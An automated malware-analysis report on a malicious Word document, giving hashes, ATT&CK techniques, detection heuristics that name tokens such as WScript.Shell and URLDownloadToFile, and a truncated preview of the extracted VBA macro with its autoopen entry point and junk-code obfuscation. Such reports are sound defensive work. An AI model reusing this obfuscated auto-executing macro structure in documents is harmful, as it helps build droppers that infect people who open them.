Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e899cbbb3884eb17…

MALICIOUS

Office (OLE)

157.2 KB Created: 2019-04-17 07:57:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 7fb997d5c0948a9b948e93d0db552735 SHA-1: 1ec420ba7f7b78d64048e6bb61af019ebbfa7bcf SHA-256: e899cbbb3884eb173bd8f11b60d2b87ea66a7449efc61cfe9e717a1af70fa5f4
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains a VBA macro with an autoopen subroutine, indicating it is designed to execute automatically upon opening. Critical heuristics indicate obfuscation techniques and the use of the GetObject API to execute code, likely to download and run a second-stage payload. The macro attempts to reassemble the string 'Win32_Process' which is a strong indicator of malicious intent.

Heuristics 8

  • ClamAV: Doc.Malware.00536d-6944243-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6944243-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28486 bytes
SHA-256: 90ed0448eb1d2a8b6f8c459e8550d1f131ca634a04f929ea7891849ffc2417e5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kDAQAC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jAAwCAA"
Attribute VB_Base = "0{F1DEB5AA-AA7A-4F5D-B93D-2FD8EF38F997}{E431C063-FB9F-4623-8290-C3369EDB84FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "oDXABDDo"
Attribute VB_Base = "0{C870EB7E-95B3-45A3-A9C4-E9FAE6C4621D}{9F4924FF-48FB-438B-AE43-90F0ACF72393}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "q1AC_X"
Sub autoopen()
   If nxGkAcC = dkAADQU Then
    jADx1A4 = 253082994 * foAQA4wQ
  ElseIf u4QCoGA = NAXCxZ Then
    Set mUZQAk = hABD_o
  ElseIf D4kwAAAc = foAAAA Then
   YAAxA_U = tB1QDA / VUAABDZB * NGUAQAA + Sqr(iAoAAB)
  ElseIf VGAwckAA = tAUA_4C Then
   bAAxBC = 712427310
End If
   If NDAAAU = Wxxk_A Then
    MADAAQc = 821092024 * rXQ4AxZ
  ElseIf oADcccA = rQUXXABw Then
    Set JAkAxABQ = KcA_DXAA
  ElseIf DUX1cA = AoA4o4Q Then
   mAAUA4Z = vCBcAUCA / cA_oACQ * fkxUQQBk + Sqr(hkUBAwXQ)
  ElseIf hAAAAAB = j_AQUo Then
   M1AA1CDA = 360151527
End If
   If sco1ZG = oAoBAoA Then
    KAABUDx = 700594498 * sAAk1XA
  ElseIf EwGAQxAA = XkAkBD Then
    Set K_Ao4A = HAkBDZ
  ElseIf NwZ1AABA = jACwXAD Then
   ECwAAUZo = zUCAxoA / QUoZUCAo * cDZ1QwcA + Sqr(u1CZCZ)
  ElseIf aADBokQA = qGAQUCQ Then
   VXBxAA4 = 53062229
End If
jADDA1DA
   If zAAABU = qAwD_1A1 Then
    CAx1Qw = 125446710 * zZAAZw4
  ElseIf EcXXBwBA = HAAUAAA Then
    Set jAQCkQ = iUAooB
  ElseIf wcowQ_ = i1XBAAAw Then
   mCBADUG = BQGABc / wD41wxBD * fQUoZ_D + Sqr(joA_BB1)
  ElseIf vA4411oB = bCUUAA Then
   pA1wo__ = 894511143
End If
   If uZAAAx_X = cXB1AZwG Then
    Io4ADDC = 399256549 * jUAXAkG
  ElseIf TA_BAwUc = P_AACBxA Then
    Set vDDGoA = TAAAZUXU
  ElseIf XQcUAB = NZZ4xwQG Then
   wQCkDA = k_cUUQ / XUDQAQ_C * MQwAABA + Sqr(wAAAAA4)
  ElseIf wQACAxQD = uA1c1_A Then
   oUkDAkCC = 111865309
End If
End Sub

Attribute VB_Name = "B_Ccc_Qc"
Function jADDA1DA()
On Error Resume Next
   If zAB4AAQ = MwBkkB Then
    uXAAAD = 866597989 * zxA4A_D
  ElseIf CCAcc1D = VCX4AUU Then
    Set CBAXUQA = D_AQwkQZ
  ElseIf vwBGBG_k = JwoBD1A Then
   NAQkZxCw = DBADA1AX / ZwUAZ4BB * vcAAAcUD + Sqr(u_BUwZo)
  ElseIf cCkCAUxU = vXDAAAD Then
   PAAABQcx = 392269431
End If
   If uBoAUoUx = wXB_1Q Then
    GUwXUAZU = 239655598 * rDZAcA
  ElseIf wAGDoABc = DUGUUAA Then
    Set XBGcA4oA = UBACcQA
  ElseIf SBQAD1 = XAcoBD Then
   N1CAAcBA = cQAU4DXw / uw1U_QA1 * rZoDU_k + Sqr(SAZA4A)
  ElseIf nBAGDD = BxABXBAA Then
   CAGcAwQA = 904319934
End If
If 9433 < 99032 Then
qUAcAB = vbFalse
   If vGo1AA4B = GQBAcDDA Then
    wZ4DBDo = 851439880 * tA1AccBA
  ElseIf DcXAGZA = X4AxBoU Then
    Set WcDA4AA1 = rxAAA_Q
  ElseIf kAADAw = GAABBA Then
   kDADAcD = oAX_ZQxA / RDoDQAA * nBADXGQ + Sqr(jAUDAw)
  ElseIf fB4AUGZ = TAcQBxXo Then
   bQcQCA = 799267966
End If
   If VCBQAAQA = oAA_BUD Then
    zAAACA = 64022806 * zAQ_4A
  ElseIf OAAQZD = H4kA_G Then
    Set SAA4ZA = z4ACA1
  ElseIf IDk1AGZ_ = pAAUUAk Then
   HZGUUA = tAA_Bo1 / bABUC_ * FBAAAU + Sqr(K4AZGA)
  ElseIf E4kwACAA = pwAAXx4 Then
   E1Ac4Z = 434060514
End If
   If V4AoB4G = KBBwwAA Then
    DQQ1GUA = 836311093 * uAC4_G
  ElseIf zAA_4Q = SAXoAx Then
    Set nAAkAABU = AwACDBA
  ElseIf bk4CAAQ = hUAoZDB Then
   jwBUUkwQ = VDA_xBAA / ZGDDCDAA * IDQ4AUoA + Sqr(lAAACAx)
  ElseIf OADUk_x = mAwZUoA Then
   BA4UAAGc = 758232136
End If
End If
   If AAAxGAwA = JXwAXA1 Then
    iAQwBxQ = 97893313 * JXQADZA
  ElseIf uAwXG4 = vADDAA Then
    Set cwUZxkQZ = WABkCU_w
  ElseIf Wc
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.